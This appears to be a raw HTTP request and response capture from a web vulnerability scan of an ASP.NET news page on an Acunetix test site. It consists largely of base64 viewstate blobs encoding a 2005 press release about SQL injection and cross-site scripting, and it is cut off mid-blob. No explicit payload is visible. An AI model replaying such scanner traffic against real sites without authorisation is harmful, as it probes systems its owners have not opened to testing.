sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc%2BNTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc%2BRmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BJnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc%2BPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk%2BRGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk%2BRmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk%2BPGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk%2BIDwvdWw%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc%2BPC9wPiAgICAgPHA%2BVXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYCHgtOYXZpZ2F0ZVVybAUSQ29tbWVudHMuYXNweD9pZD0yZGQCCw8WAh4Dc3JjBQxhZHMvZGVmLmh0bWxkZCqQXr9Bo%2Bfii5vVAAhGyfGRVNk1&__VIEWSTATEGENERATOR=532053C5&__EVENTVALIDATION=%2FwEWVwLjj6S6DAK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ944e4UqgWJpySuZGYD9y7m9ZXo%2FQ%3D%3D
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:20 GMT
          Content-Length: 30486
          
          
          Response body (30486 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&amp;id=2" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc+QWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+NTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+RmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+JnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgI